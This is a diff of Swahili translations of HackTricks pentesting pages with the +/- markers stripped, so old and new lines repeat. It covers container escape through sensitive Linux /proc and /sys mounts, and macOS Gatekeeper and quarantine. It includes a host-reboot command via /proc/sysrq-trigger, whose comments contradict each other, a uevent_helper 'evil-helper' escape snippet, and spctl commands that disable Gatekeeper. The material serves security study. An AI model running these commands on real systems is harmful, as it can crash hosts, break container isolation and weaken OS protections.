* **Mfano wa Kuzima Mwenyeji**:
|
||||
|
||||
```bash
|
||||
echo b > /proc/sysrq-trigger # Kuwasha upya mwenyeji
|
||||
echo b > /proc/sysrq-trigger # Inazima mwenyeji
|
||||
```
|
||||
|
||||
#### **`/proc/kmsg`**
|
||||
|
||||
* Inafichua ujumbe wa pete ya kernel.
|
||||
* Inafichua ujumbe wa mzunguko wa kernel.
|
||||
* Inaweza kusaidia katika uvamizi wa kernel, kuvuja kwa anwani, na kutoa habari nyeti ya mfumo.
|
||||
|
||||
#### **`/proc/kallsyms`**
|
||||
|
||||
* Inaorodhesha alama zilizosafirishwa za kernel na anwani zao.
|
||||
* Inaorodhesha ishara zilizosafirishwa za kernel na anwani zao.
|
||||
* Muhimu kwa maendeleo ya uvamizi wa kernel, hasa kwa kushinda KASLR.
|
||||
* Habari za anwani zinazuiliwa na `kptr_restrict` ikiwa imewekwa kama `1` au `2`.
|
||||
* Maelezo katika [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
|
||||
* Taarifa za anwani zinazuiliwa na `kptr_restrict` ikiwa imewekwa kama `1` au `2`.
|
||||
* Maelezo zaidi katika [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
|
||||
|
||||
#### **`/proc/[pid]/mem`**
|
||||
|
||||
* Inashirikiana na kifaa cha kumbukumbu ya kernel `/dev/mem`.
|
||||
* Kihistoria lilikuwa na mapungufu ya upandishaji wa kiwango cha ruhusa.
|
||||
* Kihistoria imekuwa hatarini kwa mashambulizi ya upandishaji wa kiwango cha ruhusa.
|
||||
* Zaidi katika [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
|
||||
|
||||
#### **`/proc/kcore`**
|
||||
|
||||
* Inawakilisha kumbukumbu halisi ya mfumo kwa muundo wa msingi wa ELF.
|
||||
* Kusoma kunaweza kufichua kumbukumbu ya mwenyeji na maudhui ya kumbukumbu za kontena zingine.
|
||||
* Inawakilisha kumbukumbu halisi ya mfumo katika muundo wa msingi wa ELF.
|
||||
* Kusoma kunaweza kufichua kumbukumbu ya mwenyeji na yaliyomo kwenye kumbukumbu za kontena zingine.
|
||||
* Ukubwa mkubwa wa faili unaweza kusababisha matatizo ya kusoma au kuharibika kwa programu.
|
||||
* Matumizi ya kina katika [Kudondosha /proc/kcore mnamo 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/).
|
||||
|
||||
#### **`/proc/kmem`**
|
||||
|
||||
* Kiolesura mbadala kwa `/dev/kmem`, ikionyesha kumbukumbu ya virtual ya kernel.
|
||||
* Inaruhusu kusoma na kuandika, hivyo kubadilisha moja kwa moja kumbukumbu ya kernel.
|
||||
* Kiolesura mbadala kwa `/dev/kmem`, ikionyesha kumbukumbu ya kernel ya kivirtuali.
|
||||
* Inaruhusu kusoma na kuandika, hivyo kuhariri moja kwa moja kumbukumbu ya kernel.
|
||||
|
||||
#### **`/proc/mem`**
|
||||
|
||||
* Kiolesura mbadala kwa `/dev/mem`, ikionyesha kumbukumbu halisi.
|
||||
* Inaruhusu kusoma na kuandika, mabadiliko ya kumbukumbu yote yanahitaji kutatua anwani za virtual hadi halisi.
|
||||
* Inaruhusu kusoma na kuandika, mabadiliko ya kumbukumbu yote yanahitaji kutatua anwani za kivirutuali hadi halisi.
|
||||
|
||||
#### **`/proc/sched_debug`**
|
||||
|
||||
|
@ -140,11 +144,11 @@ echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /ev
|
|||
|
||||
## Pata njia ya mwenyeji kutoka kwa mlima wa OverlayFS kwa kontena
|
||||
|
||||
njia_ya_mwenyeji=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
|
||||
njia\_ya\_mwenyeji=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
|
||||
|
||||
## Weka uevent\_helper kwa msaidizi wa kudanganya
|
||||
|
||||
echo "$njia_ya_mwenyeji/evil-helper" > /sys/kernel/uevent\_helper
|
||||
echo "$njia\_ya\_mwenyeji/evil-helper" > /sys/kernel/uevent\_helper
|
||||
|
||||
## Kichocheo cha uevent
|
||||
|
||||
|
@ -163,17 +167,17 @@ cat /output %%%
|
|||
|
||||
#### **`/sys/kernel/security`**
|
||||
|
||||
* Ina `securityfs` interface, ikiruhusu usanidi wa Moduli za Usalama za Linux kama AppArmor.
|
||||
* Ina `securityfs` interface, ikiruhusu usanidi wa Modules za Usalama za Linux kama AppArmor.
|
||||
* Upatikanaji unaweza kuwezesha kontena kulegeza mfumo wake wa MAC.
|
||||
|
||||
#### **`/sys/firmware/efi/vars` na `/sys/firmware/efi/efivars`**
|
||||
|
||||
* Inafunua interfaces za kuingiliana na vipengele vya EFI katika NVRAM.
|
||||
* Kutokuwa sawa au kutumia vibaya kunaweza kusababisha kompyuta zenye matatizo au mashine za mwenyeji zisizoweza kuanza.
|
||||
* Usanidi mbaya au kutumia vibaya kunaweza kusababisha kompyuta zenye matatizo au mashine za mwenyeji zisizoweza kuanza.
|
||||
|
||||
#### **`/sys/kernel/debug`**
|
||||
|
||||
* `debugfs` inatoa interface ya uchunguzi "bila sheria" kwa kernel.
|
||||
* `debugfs` inatoa interface ya kudebug "bila sheria" kwa kernel.
|
||||
* Historia ya masuala ya usalama kutokana na asili yake isiyo na kizuizi.
|
||||
|
||||
### Marejeo
|
||||
|
@ -181,3 +185,21 @@ cat /output %%%
|
|||
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)
|
||||
* [Kuelewa na Kufanya Linux Containers Kuwa Imara](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
|
||||
* [Kutumia Vibaya Linux Containers Zenye Mamlaka na Zisizo na Mamlaka](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kuvunja AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,39 +6,42 @@
|
|||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Pata [**swagi rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud)
|
||||
*
|
||||
* .
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Gatekeeper
|
||||
|
||||
**Gatekeeper** ni kipengele cha usalama kilichotengenezwa kwa mifumo ya uendeshaji ya Mac, kimeundwa kuhakikisha kuwa watumiaji **wanakimbia tu programu za kuaminika** kwenye mifumo yao. Inafanya kazi kwa **kuthibitisha programu** ambayo mtumiaji anapakua na kujaribu kufungua kutoka **vyanzo nje ya Duka la App**, kama programu, programu-jalizi, au pakiti ya usakinishaji.
|
||||
**Gatekeeper** ni kipengele cha usalama kilichotengenezwa kwa mifumo ya uendeshaji ya Mac, iliyoundwa kuhakikisha kuwa watumiaji **wanakimbia tu programu zilizoidhinishwa** kwenye mifumo yao. Inafanya kazi kwa **kuthibitisha programu** ambayo mtumiaji anapakua na kujaribu kufungua kutoka **vyanzo nje ya Duka la App**, kama programu, programu-jalizi, au pakiti ya usakinishaji.
|
||||
|
||||
Mfumo muhimu wa Gatekeeper uko katika **mchakato wake wa uthibitisho**. Inachunguza ikiwa programu iliyopakuliwa ime **sainiwa na mwandishi anayetambulika**, ikidhibitisha uhalali wa programu. Zaidi ya hayo, inahakikisha ikiwa programu ime **notarized na Apple**, ikithibitisha kuwa haina yaliyomo mabaya yanayojulikana na haijabadilishwa baada ya kufanyiwa notarization.
|
||||
Mfumo muhimu wa Gatekeeper uko katika **mchakato wake wa uthibitisho**. Inachunguza ikiwa programu iliyopakuliwa ime **sainiwa na msanidi programu anayetambulika**, ikidhibitisha uhalali wa programu. Zaidi, inahakikisha ikiwa programu ime **thibitishwa na Apple**, ikithibitisha kuwa haina yaliyomo mabaya yaliyofahamika na haijabadilishwa baada ya kuthibitishwa.
|
||||
|
||||
Kwa kuongezea, Gatekeeper inaimarisha udhibiti na usalama wa mtumiaji kwa **kuwahimiza watumiaji kuidhinisha ufunguzi** wa programu iliyopakuliwa kwa mara ya kwanza. Kinga hii husaidia kuzuia watumiaji kwa bahati mbaya kufanya kazi ya kuendesha nambari inayoweza kuwa na madhara ambayo wangeweza kufikiria ni faili ya data isiyo na madhara.
|
||||
Kwa kuongezea, Gatekeeper inaimarisha udhibiti na usalama wa mtumiaji kwa **kuwahimiza watumiaji kuidhinisha ufunguzi** wa programu iliyopakuliwa kwa mara ya kwanza. Kinga hii husaidia kuzuia watumiaji kwa bahati mbaya kukimbia nambari inayoweza kuwa na madhara ambayo wangeweza kufikiria ni faili ya data isiyo na madhara.
|
||||
|
||||
### Saini za Programu
|
||||
|
||||
Saini za programu, pia hujulikana kama saini za nambari, ni sehemu muhimu ya miundombinu ya usalama ya Apple. Hutumiwa kwa **kuthibitisha utambulisho wa mwandishi wa programu** (mwandishi) na kuhakikisha kuwa nambari haijabadilishwa tangu iliposainiwa mara ya mwisho.
|
||||
Saini za programu, pia hujulikana kama saini za nambari, ni sehemu muhimu ya miundombinu ya usalama ya Apple. Hutumiwa kwa **kuthibitisha utambulisho wa mwandishi wa programu** (msanidi programu) na kuhakikisha kuwa nambari haijabadilishwa tangu iliposainiwa mara ya mwisho.
|
||||
|
||||
Hivi ndivyo inavyofanya kazi:
|
||||
|
||||
1. **Kusaini Programu:** Wakati mwandishi anapokuwa tayari kusambaza programu yake, wan **saini programu hiyo kwa kutumia ufunguo wa kibinafsi**. Ufunguo huu wa kibinafsi unahusishwa na **cheti ambacho Apple inatoa kwa mwandishi** wanapojiandikisha katika Programu ya Watengenezaji wa Apple. Mchakato wa kusaini unajumuisha kujenga hashi ya kriptografia ya sehemu zote za programu na kuficha hashi hii na ufunguo wa kibinafsi wa mwandishi.
|
||||
2. **Kusambaza Programu:** Programu iliyosainiwa kisha inasambazwa kwa watumiaji pamoja na cheti cha mwandishi, ambacho kina ufunguo wa umma unaofanana.
|
||||
3. **Kuthibitisha Programu:** Wakati mtumiaji anapopakua na kujaribu kuendesha programu, mfumo wa uendeshaji wa Mac yao hutumia ufunguo wa umma kutoka kwa cheti cha mwandishi kufichua hashi. Kisha inahesabu upya hashi kulingana na hali ya sasa ya programu na kulinganisha hii na hashi iliyofichuliwa. Ikiwa zinafanana, inamaanisha **programu haijabadilishwa** tangu mwandishi aliposaini, na mfumo unaruhusu programu kuendeshwa.
|
||||
1. **Kusaini Programu:** Wakati msanidi programu anapokuwa tayari kusambaza programu yake, wanai **saini programu hiyo kwa kutumia ufunguo wa kibinafsi**. Ufunguo huu wa kibinafsi unahusishwa na **cheti ambacho Apple hutoa kwa msanidi programu** wanapojiandikisha katika Programu ya Watengenezaji ya Apple. Mchakato wa kusaini unahusisha kujenga hash ya kriptografia ya sehemu zote za programu na kuficha hash hii na ufunguo wa kibinafsi wa msanidi programu.
|
||||
2. **Kusambaza Programu:** Programu iliyosainiwa kisha inasambazwa kwa watumiaji pamoja na cheti cha msanidi programu, ambacho kina ufunguo wa umma unaofanana.
|
||||
3. **Kuthibitisha Programu:** Wakati mtumiaji anapopakua na kujaribu kukimbia programu, mfumo wa uendeshaji wa Mac hutumia ufunguo wa umma kutoka kwenye cheti cha msanidi programu kufichua hash. Kisha unahesabu upya hash kulingana na hali ya sasa ya programu na kulinganisha hii na hash iliyofichuliwa. Ikiwa zinafanana, inamaanisha **programu haijabadilishwa** tangu msanidi programu aliposaini, na mfumo unaruhusu programu ikimbie.
|
||||
|
||||
Saini za programu ni sehemu muhimu ya teknolojia ya Gatekeeper ya Apple. Wakati mtumiaji anapojaribu **kufungua programu iliyopakuliwa kutoka kwenye mtandao**, Gatekeeper inathibitisha saini ya programu. Ikiwa imesainiwa na cheti kilichotolewa na Apple kwa mwandishi anayejulikana na nambari haijabadilishwa, Gatekeeper inaruhusu programu kuendeshwa. Vinginevyo, inazuia programu na kuwajulisha mtumiaji.
|
||||
Saini za programu ni sehemu muhimu ya teknolojia ya Gatekeeper ya Apple. Wakati mtumiaji anapojaribu **kufungua programu iliyopakuliwa kutoka kwenye mtandao**, Gatekeeper huthibitisha saini ya programu. Ikiwa imesainiwa na cheti kilichotolewa na Apple kwa msanidi programu anayejulikana na nambari haijabadilishwa, Gatekeeper inaruhusu programu ikimbie. Vinginevyo, inazuia programu na kuwajulisha mtumiaji.
|
||||
|
||||
Kuanzia macOS Catalina, **Gatekeeper pia huchunguza ikiwa programu ime notarized** na Apple, ikiongeza safu ya ziada ya usalama. Mchakato wa notarization huchunguza programu kwa masuala ya usalama yanayojulikana na nambari mbaya, na ikiwa uchunguzi huu unapita, Apple huongeza tiketi kwa programu ambayo Gatekeeper inaweza kuthibitisha.
|
||||
Kuanzia macOS Catalina, **Gatekeeper pia huchunguza ikiwa programu imeidhinishwa** na Apple, ikiongeza safu ya ziada ya usalama. Mchakato wa idhinisho huchunguza programu kwa masuala ya usalama yanayofahamika na nambari yenye nia mbaya, na ikiwa uchunguzi huu unapita, Apple huongeza tiketi kwa programu ambayo Gatekeeper inaweza kuthibitisha.
|
||||
|
||||
#### Angalia Saini
|
||||
|
||||
Wakati wa kuchunguza **sampuli ya zisizo za programu**, unapaswa daima **kuangalia saini** ya binary kwani **mwandishi** aliyosaini inaweza tayari kuwa **husiana** na **zisizo za programu.**
|
||||
Unapochunguza **sampuli ya zisizo** unapaswa daima **kuangalia saini** ya binary kwani **msanidi programu** aliyosaini inaweza tayari kuwa **husiana** na **zisizo.**
|
||||
```bash
|
||||
# Get signer
|
||||
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
|
||||
|
@ -57,11 +60,11 @@ codesign -s <cert-name-keychain> toolsdemo
|
|||
```
|
||||
### Kuidhinisha
|
||||
|
||||
Mchakato wa kuidhinisha wa Apple hutumika kama kinga ya ziada kulinda watumiaji kutokana na programu zenye madhara. Inahusisha **mwendelezaji kuwasilisha maombi yao kwa uchunguzi** na **Huduma ya Kuidhinisha ya Apple**, ambayo isichanganywe na Ukaguzi wa Programu. Huduma hii ni **mfumo wa kiotomatiki** unaopitia programu iliyowasilishwa kwa uwepo wa **maudhui yenye nia mbaya** na masuala yoyote yanayowezekana na uwekaji wa saini ya kanuni.
|
||||
Mchakato wa kuidhinisha wa Apple ni kinga ya ziada ya kulinda watumiaji kutokana na programu ambazo zinaweza kuwa hatari. Inahusisha **mwendelezaji kuwasilisha maombi yao kwa ukaguzi** na **Huduma ya Kuidhinisha ya Apple**, ambayo isichanganywe na Ukaguzi wa Programu. Huduma hii ni **mfumo wa kiotomatiki** unaopitia programu iliyowasilishwa kwa uwepo wa **maudhui mabaya** na masuala yoyote yanayowezekana na uwekaji wa saini ya nambari.
|
||||
|
||||
Ikiwa programu **inapita** uchunguzi huu bila kuleta wasiwasi wowote, Huduma ya Kuidhinisha hutoa tiketi ya kuidhinisha. Mwendelezaji kisha anatakiwa **kuambatanisha tiketi hii kwenye programu yao**, mchakato unaojulikana kama 'kushona.' Zaidi ya hayo, tiketi ya kuidhinisha pia huwekwa mtandaoni ambapo Gatekeeper, teknolojia ya usalama ya Apple, inaweza kuipata.
|
||||
Ikiwa programu **inapita** ukaguzi huu bila kuleta wasiwasi wowote, Huduma ya Kuidhinisha inazalisha tiketi ya kuidhinisha. Mwendelezaji kisha anatakiwa **kuambatanisha tiketi hii kwenye programu yao**, mchakato unaojulikana kama 'kushona.' Zaidi ya hayo, tiketi ya kuidhinisha pia huwekwa mtandaoni ambapo Gatekeeper, teknolojia ya usalama ya Apple, inaweza kuipata.
|
||||
|
||||
Wakati mtumiaji anapoinstall au kuzindua programu kwa mara ya kwanza, uwepo wa tiketi ya kuidhinisha - iwe imefungwa kwenye kutekelezeka au kupatikana mtandaoni - **inamjulisha Gatekeeper kwamba programu imekuidhinishwa na Apple**. Kama matokeo, Gatekeeper huonyesha ujumbe maelezo katika dirisha la kuzindua awali, ukionyesha kuwa programu imepitia ukaguzi wa maudhui yenye nia mbaya na Apple. Mchakato huu hivyo huimarisha imani ya mtumiaji katika usalama wa programu wanazoinstall au kuzindua kwenye mifumo yao.
|
||||
Wakati mtumiaji anapoinstall au kuzindua programu kwa mara ya kwanza, uwepo wa tiketi ya kuidhinisha - iwe imefungwa kwenye kutekelezeka au imepatikana mtandaoni - **inamjulisha Gatekeeper kwamba programu imekuidhinishwa na Apple**. Kama matokeo, Gatekeeper inaonyesha ujumbe wa maelezo katika dirisha la kuzindua awali, ikionyesha kuwa programu imepitia ukaguzi wa maudhui mabaya na Apple. Mchakato huu hivyo huimarisha imani ya mtumiaji katika usalama wa programu wanazoinstall au kuzindua kwenye mifumo yao.
|
||||
|
||||
### Kuhesabu GateKeeper
|
||||
|
||||
|
@ -76,11 +79,11 @@ spctl --status
|
|||
Tafadhali kumbuka kuwa ukaguzi wa saini wa GateKeeper hufanywa tu kwa **faili zenye sifa ya Karantini**, si kwa kila faili.
|
||||
{% endhint %}
|
||||
|
||||
GateKeeper itachunguza ikiwa kulingana na **mapendeleo na saini** binary inaweza kutekelezwa:
|
||||
GateKeeper itaangalia ikiwa kulingana na **mapendeleo na saini** binary inaweza kutekelezwa:
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (1147).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Database inayoshikilia usanidi huu iko katika **`/var/db/SystemPolicy`**. Unaweza kukagua hii database kama root kwa:
|
||||
Database inayoshikilia usanidi huu iko katika **`/var/db/SystemPolicy`**. Unaweza kuangalia database hii kama root kwa:
|
||||
```bash
|
||||
# Open database
|
||||
sqlite3 /var/db/SystemPolicy
|
||||
|
@ -94,7 +97,7 @@ anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists
|
|||
anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID
|
||||
[...]
|
||||
```
|
||||
Tambua jinsi sheria ya kwanza ilivyomalizika katika "**App Store**" na ile ya pili katika "**Developer ID**" na kwamba katika picha iliyopita ilikuwa **imezimishwa kutekeleza programu kutoka kwa App Store na waendelezaji waliojulikana**.\
|
||||
Tambua jinsi sheria ya kwanza ilivyomalizika katika "**App Store**" na ya pili katika "**Developer ID**" na kwamba katika picha iliyopita ilikuwa **imezimwa kutekeleza programu kutoka kwa App Store na waendelezaji waliojulikana**.\
|
||||
Ikiwa **ubadilishe** mipangilio hiyo kuwa App Store, sheria za "**Notarized Developer ID" zitaondoka**.
|
||||
|
||||
Pia kuna maelfu ya sheria za **aina ya GKE**:
|
||||
|
@ -126,11 +129,11 @@ Wakati inapowezeshwa kabisa, chaguo jipya litatokea:
|
|||
|
||||
<figure><img src="../../../.gitbook/assets/image (1148).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Inawezekana **kuangalia ikiwa Programu itaruhusiwa na GateKeeper** na:
|
||||
Inawezekana **kuangalia kama Programu itaruhusiwa na GateKeeper** na:
|
||||
```bash
|
||||
spctl --assess -v /Applications/App.app
|
||||
```
|
||||
Inawezekana kuongeza sheria mpya kwenye GateKeeper kuruhusu utekelezaji wa programu fulani kwa:
|
||||
Inawezekana kuongeza sheria mpya kwenye GateKeeper kuruhusu utekelezaji wa programu fulani na:
|
||||
```bash
|
||||
# Check if allowed - nop
|
||||
spctl --assess -v /Applications/App.app
|
||||
|
@ -145,16 +148,16 @@ sudo spctl --enable --label "whitelist"
|
|||
spctl --assess -v /Applications/App.app
|
||||
/Applications/App.app: accepted
|
||||
```
|
||||
### Kuarantini Faili
|
||||
### Kuarantini ya Faili
|
||||
|
||||
Baada ya **kupakua** programu au faili, programu maalum za macOS kama vivinjari vya wavuti au wateja wa barua pepe **huziambatanisha sifa ya faili iliyozidishwa**, inayojulikana kama "**bendera ya kuarantini**," kwa faili iliyopakuliwa. Sifa hii hufanya kama hatua ya usalama kwa kumtambua faili kama inayotoka kwenye chanzo ambacho hakijathibitishwa (mtandao), na inaweza kuwa na hatari. Hata hivyo, si programu zote huziambatanisha sifa hii, kwa mfano, programu za wateja wa BitTorrent mara nyingi hupuuza mchakato huu.
|
||||
Baada ya **kupakua** programu au faili, **programu maalum za macOS** kama vivinjari vya wavuti au wateja wa barua pepe **huziambatanisha sifa ya faili iliyoziduliwa**, inayojulikana kama "**bendera ya kuarantini**," kwa faili iliyopakuliwa. Sifa hii hufanya kama hatua ya usalama kwa kumtambua **faili** kama ikitoka kwenye chanzo ambacho hakijathibitishwa (mtandao), na inaweza kuwa na hatari. Hata hivyo, si programu zote huziambatanisha sifa hii, kwa mfano, programu za wateja wa BitTorrent mara nyingi hupuuza mchakato huu.
|
||||
|
||||
**Uwepo wa bendera ya kuarantini hutoa ishara kwa kipengele cha usalama cha Gatekeeper cha macOS wakati mtumiaji anajaribu kutekeleza faili**.
|
||||
**Uwepo wa bendera ya kuarantini hutoa ishara kwa kipengele cha usalama cha macOS, Gatekeeper, wakati mtumiaji anajaribu kutekeleza faili**.
|
||||
|
||||
Katika kesi ambapo **bendera ya kuarantini haipo** (kama ilivyo kwa faili zilizopakuliwa kupitia baadhi ya wateja wa BitTorrent), **uchunguzi wa Gatekeeper hauwezi kufanywa**. Hivyo, watumiaji wanapaswa kuwa waangalifu wanapofungua faili zilizopakuliwa kutoka vyanzo visivyo salama au visivyofahamika.
|
||||
Katika kesi ambapo **bendera ya kuarantini haipo** (kama ilivyo kwa faili zilizopakuliwa kupitia baadhi ya wateja wa BitTorrent), **uchunguzi wa Gatekeeper huenda usifanywe**. Hivyo, watumiaji wanapaswa kuwa waangalifu wanapofungua faili zilizopakuliwa kutoka vyanzo visivyo salama au visivyofahamika.
|
||||
|
||||
{% hint style="info" %}
|
||||
**Kuchunguza** **uthabiti** wa sahihi za nambari ni mchakato **wenye kutumia rasilimali nyingi** ambao unajumuisha kuzalisha **hashes** za kriptografia za nambari na rasilimali zake zote zilizopangwa. Zaidi ya hayo, kuchunguza uthabiti wa cheti kunahusisha kufanya **uchunguzi mtandaoni** kwa seva za Apple kuona ikiwa kimebatilishwa baada ya kutolewa. Kwa sababu hizi, uchunguzi kamili wa sahihi ya nambari na uthibitishaji hauwezi **kutekelezwa kila wakati programu inapoanzishwa**.
|
||||
**Kuchunguza** **uthabiti** wa sahihi za nambari ni mchakato **wenye kutumia rasilimali nyingi** ambao unajumuisha kuzalisha **hashi za kriptografia** za nambari na rasilimali zake zote zilizopangwa. Zaidi ya hayo, kuchunguza uthabiti wa cheti kunahusisha kufanya **uchunguzi mtandaoni** kwa seva za Apple kuona ikiwa cheti kimebatilishwa baada ya kutolewa. Kwa sababu hizi, uchunguzi kamili wa sahihi ya nambari na uthibitishaji hauwezi **kutekelezwa kila wakati programu inapoanzishwa**.
|
||||
|
||||
Hivyo, uchunguzi huu **hufanywa tu wakati wa kutekeleza programu zilizo na sifa ya kuarantini**.
|
||||
{% endhint %}
|
||||
|
@ -162,10 +165,10 @@ Hivyo, uchunguzi huu **hufanywa tu wakati wa kutekeleza programu zilizo na sifa
|
|||
{% hint style="warning" %}
|
||||
Sifa hii lazima **ithibitishwe na programu inayounda/inayopakua** faili.
|
||||
|
||||
Hata hivyo, faili zilizofungwa kwa mchanga zitakuwa na sifa hii imewekwa kwa kila faili wanayounda. Na programu zisizofungwa kwa mchanga zinaweza kuweka wenyewe, au kufafanua [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/lsfilequarantineenabled?language=objc) funguo katika **Info.plist** ambayo itafanya mfumo kuweka sifa ya kuarantini ya `com.apple.quarantine` kwa faili zilizoanzishwa,
|
||||
Hata hivyo, faili zilizofungwa kwenye sanduku la mchanga zitakuwa na sifa hii imewekwa kwa kila faili wanayounda. Na programu zisizofungwa kwenye sanduku la mchanga zinaweza kuweka wenyewe, au kufafanua [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/lsfilequarantineenabled?language=objc) funguo katika **Info.plist** ambayo itafanya mfumo kuweka sifa ya kuarantini ya `com.apple.quarantine` kwa faili zilizoanzishwa,
|
||||
{% endhint %}
|
||||
|
||||
Inawezekana **kuangalia hali yake na kuwezesha/kulemaza** (inahitaji mizizi) kwa:
|
||||
Inawezekana **kuangalia hali yake na kuwezesha/kulemaza** (inahitaji ruhusa ya msingi) kwa:
|
||||
```bash
|
||||
spctl --status
|
||||
assessments enabled
|
||||
|
@ -174,13 +177,13 @@ spctl --enable
|
|||
spctl --disable
|
||||
#You can also allow nee identifies to execute code using the binary "spctl"
|
||||
```
|
||||
Unaweza pia **kupata kama faili ina sifa ya ziada ya karantini** na:
|
||||
Unaweza pia **kupata kama faili ina sifa ya karantini iliyosambazwa** na:
|
||||
```bash
|
||||
xattr file.png
|
||||
com.apple.macl
|
||||
com.apple.quarantine
|
||||
```
|
||||
Angalia **thamani** ya **sifa za ziada** na tafuta programu iliyoandika sifa ya karantini na:
|
||||
Angalia **thamani** ya **sifa za ziada** na ugundue programu iliyoandika sifa ya karantini na:
|
||||
```bash
|
||||
xattr -l portada.png
|
||||
com.apple.macl:
|
||||
|
@ -276,17 +279,17 @@ find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; pri
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
Taarifa za karantini pia hufanywa katika database kuu inayosimamiwa na LaunchServices katika **`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**.
|
||||
Taarifa za karantini pia hufanywa kuhifadhiwa katika database kuu inayosimamiwa na LaunchServices katika **`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**.
|
||||
|
||||
#### **Quarantine.kext**
|
||||
|
||||
Upanuzi wa kernel unapatikana tu kupitia **cache ya kernel kwenye mfumo**; hata hivyo, unaweza kupakua **Kernel Debug Kit kutoka https://developer.apple.com/**, ambayo italeta toleo lililobainishwa la upanuzi.
|
||||
Upanuzi wa kernel unapatikana tu kupitia **cache ya kernel kwenye mfumo**; hata hivyo, unaweza kupakua **Kernel Debug Kit kutoka https://developer.apple.com/**, ambayo italeta toleo lililowekwa alama ya upanuzi.
|
||||
|
||||
### XProtect
|
||||
|
||||
XProtect ni kipengele kilichojengwa cha **kuzuia zisizo (anti-malware)** katika macOS. XProtect **huchunguza programu yoyote wakati inazinduliwa kwa mara ya kwanza au kuhaririwa dhidi ya database** yake ya programu hasidi inayojulikana na aina za faili hatari. Unapopakua faili kupitia programu fulani, kama Safari, Mail, au Messages, XProtect hufanya uchunguzi wa moja kwa moja wa faili hiyo. Ikiwa inalingana na programu hasidi inayojulikana katika database yake, XProtect itazuia faili hiyo isizinduliwe na kukuarifu kuhusu tishio.
|
||||
